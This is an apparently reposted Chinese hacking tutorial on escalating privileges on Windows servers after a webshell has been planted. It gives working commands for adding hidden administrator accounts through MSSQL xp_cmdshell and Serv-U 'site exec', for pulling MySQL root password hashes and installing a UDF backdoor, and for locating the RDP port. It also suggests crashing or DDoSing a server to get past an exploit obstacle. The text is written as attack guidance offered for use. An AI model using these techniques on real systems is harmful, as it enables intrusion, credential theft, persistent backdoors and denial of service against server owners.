如何找到准确的终端连接端口？（转）

(( 如何找到准确的终端连接端口？))

 

在aspx大马里，点击“系统信息”第三个就是目前的3389端口

 

或是执行命令查看正在运行的服务：tasklist /svc

 

找到：svchost.exe 1688 TermService

 

记住1688这个ID值，

 

查看开放的所有端口：netstat -ano

 

找到1688这个ID值所对应的端口就是3389目前的端口

 

 

 

 

 

(( iis6提权提示Can not find wmiprvse.exe的突破方法 ))

 

突破方法一：

 

在IIS环境下，如果权限做得不严格，我们在aspx大马里面是有权限直接结束wmiprvse.exe进程的，进程查看里面直接K掉

 

在结束之后，它会再次运行，这时候的PID值的不一样的。这时候我们回来去运行exp，直接秒杀。

 

 

突破方法二：

 

虚拟主机，一般权限严格限制的，是没权限结束的，这时候我们可以考虑配合其他溢出工具让服务器强制重启，比如“直接使服务器蓝屏重启的东东”

 

甚至可以暴力点，DDOS秒杀之，管理发现服务器不通了首先肯定是以为服务器死机，等他重启下服务器（哪怕是IIS重启下）同样秒杀之。

 

 

 

 

 

(( 本地溢出提权 ))

 

计算机有个地方叫缓存区,程序的缓存区长度是被事先设定好的,如果用户输入的数据超过了这个缓存区的长度,那么这个程序就会溢出了.

 

缓存区溢出漏洞主要是由于许多软件没有对缓存区检查而造成的.

 

利用一些现成的造成溢出漏洞的exploit通过运行,把用户从users组或其它系统用户中提升到administrators组.

 

想要执行cmd命令，就要wscript.shell组建支持，或是支持aspx脚本也行，因为aspx脚本能调用.net组件来执行cmd的命令.

 

 

 

 

 

(( sa提权 ))

 

扫描开放的端口，1433开了就可以找sa密码提权，用大马里的搜索文件功能，sa密码一般在conn.asp config.asp web.config 这三个文件

 

也可以通过注册表找配置文件，看下支持aspx不，支持的话跨目录到别的站点上找，找到之后用aspshell自带的sql提权登录再执行命令创建用户即可。

 

aspx马提权执行命令有点不一样，点击数据库管理--选MSSQL--server=localhost;UID=sa;PWD=;database=master;Provider=SQLOLEDB--输入帐号密码连接即可

 

增加一个用户：exec master.dbo.xp_cmdshell 'net user jianmei daxia.asd /add';--

提升为管理员：exec master.dbo.xp_cmdshell 'net localgroup administrators jianmei /add';--

 

PS:如果增加不上，说明是xp_cmdshell组建没有，增加xp_cmdshell组建：Use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')

 

 

 

 

 

(( root提权 ))

 

利用mysql提权的前提就是,服务器安装了mysql,mysql的服务没有降权,是默认安装以系统权限继承的(system权限). 并且获得了root的账号密码

 

如何判断一台windows服务器上的mysql有没有降权？

cmd命令net user 如果存在 mysql

 

mssql这样用户或者类似的.通常就是它的mssql mysql服务已经被降权运行了

 

如何判断服务器上是否开启了mysql服务？

开了3306端口，有的管理员会把默认端口改掉.另一个判断方法就是网站是否支持php,一般支持的话都是用mysql数据库的.

 

如何查看root密码？

在mysql的安装目录下找到user.myd这个文件，root就藏在里面，一般是40位cmd加密，一些php网站安装的时候用的是root用户,在conn.asp config.asp这些文件里。

有时会显得很乱，这时就需要自己去组合，前17位在第一行可以找到，还有23位在第三行或是其他行，自己继续找。

 

可以直接用php脚本里“mysql执行”，或是上传个UDF.php，如果网站不支持PHP，可以去旁一个php的站，也可以把UDF.php上传到别的phpshell上也可以。

 

填入帐号密码之后，自然就是安装DLL了，点击“自动安装Mysql BackDoor” 显示导出跟创建函数成功后，紧接着执行增加用户的命令即可。

 

注意：5.0版本以下(包括5.0的)默认c:\windows\系统目录就可以了，5.1版本以上的不能导出到系统目录下创建自定义函数，只能导出在mysql安装目录下的lib/plugin目录中

 

例如：D:/Program Files/MySQL/MySQL Server 5.1/lib/plugin/mysql.dll

 

如果密码看不见，或是组合不到40位，就本地安装一个mysql吧，

1、停止mysql服务

2、替换下载下来的3个文件（user.MYI user.MYD user.frm）

3、cmd切换到bin目录下，进入mysql安全模式，cmd命令：mysqld-nt --skip-grant-tables

4、重新打开一个cmd 切换到bin目录下，cmd命令：mysql -u root 版本不同有可能是：mysql -uroot -proot

5、最后查询一下就出来了select user,password from mysql.user;

 

 

 

 

 

(( serv-u提权 ))

 

这个文件里包含serv-u的md5密码：C:\Program Files\RhinoSoft.com\Serv-U\\ServUDaemon.ini

 

找到这个文件：ServUDaemon.ini 打开找到：LocalSetupPassword=nqFCE64E0056362E8FCAF813094EC39BC2

 

再拿md5密文去解密，再用现在的密码登陆提权即可。

 

serv-u提权的前提是43958端口开了，且知道帐号密码！

 

如果帐号密码默认，直接用shell里面的serv-u提权功能即可搞定，建议用aspx马、php马去提权，因为可以看回显。

 

530说明密碼不是默认的,回显330说明成功，900说明密码是默认的.................

 

在程序里找个快捷方式，或是相关的文件进行下载到本地，再查看文件的属性，就可以找到serv-u的安装目录了。

 

目录有修改权限之serv-u提权：

 

找到serv-u的目录，再找到用户的配置文件ServUDaemon.ini，直接增加一个用户代码，保存！

 

接着本地cmd命令：ftp 服务器ip

 

回车，输入帐号密码再回车......................

 

接着先试试普通的cmd命令提权，不行的话就使用ftp提权的命令：

 

Quote site exec net user jianmei dax

 

ia /add 增加一个用户

 

Quote site exec net localgroup administrators jianmei /add 提升到管理员权限

 

200 EXEC command successful (TID=33). 执行成功的回显信息

 

Maintenance=System 权限类型多加一行指定新加帐号为系统管理员

 

ReloadSettings=True 在修改ini文件后需加入此项，这时serv-u会自动刷新配置文件并生效